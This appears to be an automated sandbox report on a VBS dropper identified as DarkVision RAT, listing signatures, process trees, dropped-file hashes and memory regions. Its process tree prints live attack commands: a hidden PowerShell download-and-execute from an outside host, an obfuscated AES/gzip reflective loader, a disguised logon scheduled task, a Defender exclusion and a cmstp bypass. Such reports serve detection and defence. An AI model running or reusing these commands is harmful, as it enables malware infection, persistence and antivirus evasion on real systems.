Analysis

  • max time kernel
    94s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-12-2024 17:51

General

  • Target

    2570_output.vbs

  • Size

    421KB

  • MD5

    1304afcdfc224427dfe647dd10025628

  • SHA1

    54de753563e6a041ca67a90e50c121cd32f2e125

  • SHA256

    13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

  • SHA512

    23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506

  • SSDEEP

    6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Malware Config

Signatures

  • DarkVision Rat

    DarkVision Rat is a trojan written in C++.

  • Darkvision family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • .NET Reactor proctector 1 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 42 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4804
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3428
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3976
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA5E5.tmp" "c:\Users\Admin\AppData\Local\Temp\b354ygql\CSCBF6DCB1C89F2491BB711D588CFC66CC7.TMP"
          4⤵
            PID:3516
        • C:\windows\system32\cmstp.exe
          "C:\windows\system32\cmstp.exe" /au C:\windows\temp\f5wfs5m4.inf
          3⤵
            PID:232
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3912
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2612
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
              4⤵
                PID:2308
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4436
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:464
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
                  5⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1016
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3244
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4152
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4860
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network68537Man.cmd';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
                      7⤵
                        PID:4392
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of WriteProcessMemory
                        PID:1404
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3100
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network68537Man')
                          8⤵
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2928
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                          8⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2840
                        • C:\ProgramData\Server\server.exe
                          "C:\ProgramData\Server\server.exe" {BBD4D601-E96C-4865-9F7D-5ED63C15EBAF}
                          8⤵
                          • Executes dropped EXE
                          • Suspicious behavior: EnumeratesProcesses
                          PID:4512
                      • C:\Windows\system32\timeout.exe
                        timeout /nobreak /t 1
                        7⤵
                        • Delays execution with timeout.exe
                        PID:4576
                • C:\Windows\system32\timeout.exe
                  timeout /nobreak /t 1
                  4⤵
                  • Delays execution with timeout.exe
                  PID:512
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
            1⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:648
          • C:\Windows\system32\taskkill.exe
            taskkill /IM cmstp.exe /F
            1⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4992

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\ProgramData\Server\server.exe

            Filesize

            442KB

            MD5

            04029e121a0cfa5991749937dd22a1d9

            SHA1

            f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

            SHA256

            9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

            SHA512

            6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            2KB

            MD5

            6ff7f95a302e0c50d8d4f7b24d66fdfb

            SHA1

            e8c7ab533ed7aaf6d3d4e0e00878b018c1af2572

            SHA256

            9a413c30009de6090b7cde2bcb14b0e7354e51c24e8ae9adf8b15e646c82dd2e

            SHA512

            3fb5ffa171af2acad18ae929bcae8386988bd1316898818dfe3fdc678cd7125154f364f13621a3e765f089dd17d5ce9e68af85bb4113b364a552a2dfedda1d5d

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

            Filesize

            2KB

            MD5

            e4de99c1795fd54aa87da05fa39c199c

            SHA1

            dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

            SHA256

            23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

            SHA512

            796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            3e7d1229ce9681666aa6cd4efc4a2113

            SHA1

            0cbca0bdd18c2f3f8204ba58b2fe98cdd11d3060

            SHA256

            585352dc2a63819062b74da4e6db1b40aa4344a1dff7e6fff440366cfe1a3847

            SHA512

            f0e72428dd8a969621b8248cd3aae921df888d13a707efa13d98a9d121c843535378945b95f23f29d3ba6c4d49bd59506634b88f74c5ce79c8947266f8f0c600

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            09392ba78a0151b728c14aa32208cf70

            SHA1

            aad606be1828e1d596fb199bb610c187d9193176

            SHA256

            7381b12b8daa10c2bc944459a2e5227c772a51a7a6e39dcf7bfa4e57c20e4ace

            SHA512

            ecfb4bffc2371c4a3d042ddbf951c53dcce1bc7c4b6e9d1045d7a611ddbdb36f48522fdfca2cb52c4fde0903d2508dab58598c2688de767a2546ecfa4662cc37

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            2788f5e2211ebcf304628043fe660c91

            SHA1

            129d672c001464af8a755ccc461f4c87997766f1

            SHA256

            b5e8703199052c2b847bc541b46c3f63ae8e2b510e2edcab98af2038255b4b84

            SHA512

            616972dd0407a4d11a0882c9a202c106f7349a2c530c8b7cd169af05c10105c200f04a904c17134c442cfc9d065068fd2046332e33abd14ce35d315edc21c086

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            896B

            MD5

            3d7b2d4879bfe0095ac31e5be1a4eebf

            SHA1

            ff2a47f388307191ca88127b68e6cc3683421ee0

            SHA256

            a358e93a31c15c49dcae7ffa6f4a14a81da91c4b486e30208536a920127e3467

            SHA512

            9b1bf1c3da615813b5d9568712fcebd0006792607a8727f7cabc7b2f9c24d2502a0a355cf1e2da69d3ef12f8fda4f77c72011b28d8ec11ba2e71cefd7e59ccfc

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            e70b24fbe1a86e51e396c907b244c701

            SHA1

            18d081a62ae46c425be7f583dda45cc3c81ddd23

            SHA256

            4e8072e1d2c18c892364a663463766453b3958c71bc25e2c8e0c47bd341eac73

            SHA512

            1f55bc804858a5aeb556c1f58721aae1641c4c3c408351c38d6648e013546e883bd1b00ead8f345889c3644030931ea1269003c49c3ab7d1864a106eb0549c16

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            ea00fa61c8f36005e1bdefe522ffae76

            SHA1

            e9ca717f63327b39fefbcdbea2d987261e53529f

            SHA256

            380c15998927ac363f599bcf4054de3380892ff9c6ee1afe9ca89cd37fcdf1e9

            SHA512

            76e6511fd03b49565c657287d3cb2389641bcf2651bb70a65d3503e686259ab3684e8fd5833bfa02d3a00b667add603dfa66dda10fab1bc3faf3ca0a37990d20

          • C:\Users\Admin\AppData\Local\Temp\RESA5E5.tmp

            Filesize

            1KB

            MD5

            5101a985d3d9b5f6d8a85f10d814e91c

            SHA1

            bbc3f4384e0f5f30b8cc2a4bafb6e623788fc9f6

            SHA256

            1990bb72577ca60da00443daf52f3b5ebec5130d10fee04d64f0b0524830f788

            SHA512

            65154ec46ec9184142adcee2ea453af4b5cb16273c2aa7e516e0c12bebbfc9cb499e115b931c1ebad8c2a19a4481e09c50808a7b0764941f4b6be42be6b9d6ff

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0zteriel.cem.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.dll

            Filesize

            4KB

            MD5

            f3e03e05def1f66c96ec3d0aa04c3a85

            SHA1

            6c64abd6802a129273e01b455e3ed8fd63bfacae

            SHA256

            516ead4c37660189e3d224262f54083aa619bd9984643e65dadf56375c461fe8

            SHA512

            cf6f67435cfb989513d796a149a8cf8db61c78b63c4456448c9e8c008d56d34245c11ee0985044bc625e825f2d87918be113ce254d17fbe7b6daa22a5f237b03

          • C:\Users\Admin\AppData\Local\Temp\n1.bat

            Filesize

            420KB

            MD5

            a21d4680c8d115c444119d6b1ca6aed6

            SHA1

            fdbb2d3c7eb9ea5c93781f91bf2157d25f82c2f2

            SHA256

            1f25a0b4e9b17c826aa68d775dab0605edbddf39963943358406285f157b4e9f

            SHA512

            b3b9ce5c820399bd7f8f80af4300328a5153ae8b15f2b00c85dba1fc983d02e739cae84ded8e831e845443e3226ff778c146598b0089076fcd9ac59830a47452

          • C:\windows\temp\f5wfs5m4.inf

            Filesize

            675B

            MD5

            0a85805c6649ad8e6f40c9ddc1258a49

            SHA1

            69ca8a686c49218281a09bbed22ef55654a04459

            SHA256

            f20428b0f70a5fa861f27eef9583b473217ee467ef39f475d337f073851436be

            SHA512

            16775646f1df49f479e967c885e9948c52fcd31abc2041c63a50fd32e1380d3d963612d02f2db62e39c3bdcc959eb2d56f40d9f0f82a36897c8340206e355fad

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\CSCBF6DCB1C89F2491BB711D588CFC66CC7.TMP

            Filesize

            652B

            MD5

            ba4500c647b2c6299f68e01b9df16ed0

            SHA1

            879d8da67400f1410ce23fde7824a106bf9ac149

            SHA256

            c56df21e810b1e5ce7a2072d2ae8eec126f5ad30aa226032d664c041e3ea2932

            SHA512

            4d1a5e603fdde446bceba2c6a450502847c0439e98772f5e84cd61e32d37235175841040dfe37b27e66554b75f11302fa4a6aac6fd037a044fe402ba023642df

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.0.cs

            Filesize

            2KB

            MD5

            b8f676e5e58a88c030c8437cf8c44510

            SHA1

            d2a94f790a3f41e2e207b6875c3215ad6788d902

            SHA256

            4580f48e57bafd774e5e2f48b8a7c67541f6cffd366fe702d1d414ca74abe1ab

            SHA512

            66af99543b3d818bcc700e32686067c8483135f94492f3e6f5a58c8d55ef6f4488052a9311d37fc822284f41b0eec0edfcf12beba4b91b62d42acc3578220b7e

          • \??\c:\Users\Admin\AppData\Local\Temp\b354ygql\b354ygql.cmdline

            Filesize

            369B

            MD5

            98d5ad93886fb627b1e50875bf2675f4

            SHA1

            cf5343ba99e01b285fa5239ca5e380bfb1e1c94f

            SHA256

            5799fe2724c5e73ea553caa09256c30ffbc041b9e8764b7f858a088aaffee6cc

            SHA512

            f19b1e9f81c5fa676fa4d2efc5725b1666ebd946d28b60fb71cf4207315c0bcca2249383c24262e3f6469b2c8f219fbee63ecc2cd6979869b3ba6cda4efa3f4d

          • memory/1404-144-0x0000000140000000-0x000000014007A000-memory.dmp

            Filesize

            488KB

          • memory/1404-143-0x00000186CE830000-0x00000186CE886000-memory.dmp

            Filesize

            344KB

          • memory/3428-13-0x000001C2B2CA0000-0x000001C2B2CBC000-memory.dmp

            Filesize

            112KB

          • memory/3428-12-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp

            Filesize

            10.8MB

          • memory/3428-26-0x000001C2B2CC0000-0x000001C2B2CC8000-memory.dmp

            Filesize

            32KB

          • memory/3428-0-0x00007FF91E913000-0x00007FF91E915000-memory.dmp

            Filesize

            8KB

          • memory/3428-44-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp

            Filesize

            10.8MB

          • memory/3428-43-0x00007FF91E913000-0x00007FF91E915000-memory.dmp

            Filesize

            8KB

          • memory/3428-11-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp

            Filesize

            10.8MB

          • memory/3428-1-0x000001C2B0AA0000-0x000001C2B0AC2000-memory.dmp

            Filesize

            136KB

          • memory/3428-48-0x00007FF91E910000-0x00007FF91F3D1000-memory.dmp

            Filesize

            10.8MB

          • memory/4436-74-0x00000251FB3D0000-0x00000251FB424000-memory.dmp

            Filesize

            336KB

          • memory/4436-63-0x00000251FB350000-0x00000251FB3C6000-memory.dmp

            Filesize

            472KB

          • memory/4436-62-0x00000251FAF00000-0x00000251FAF44000-memory.dmp

            Filesize

            272KB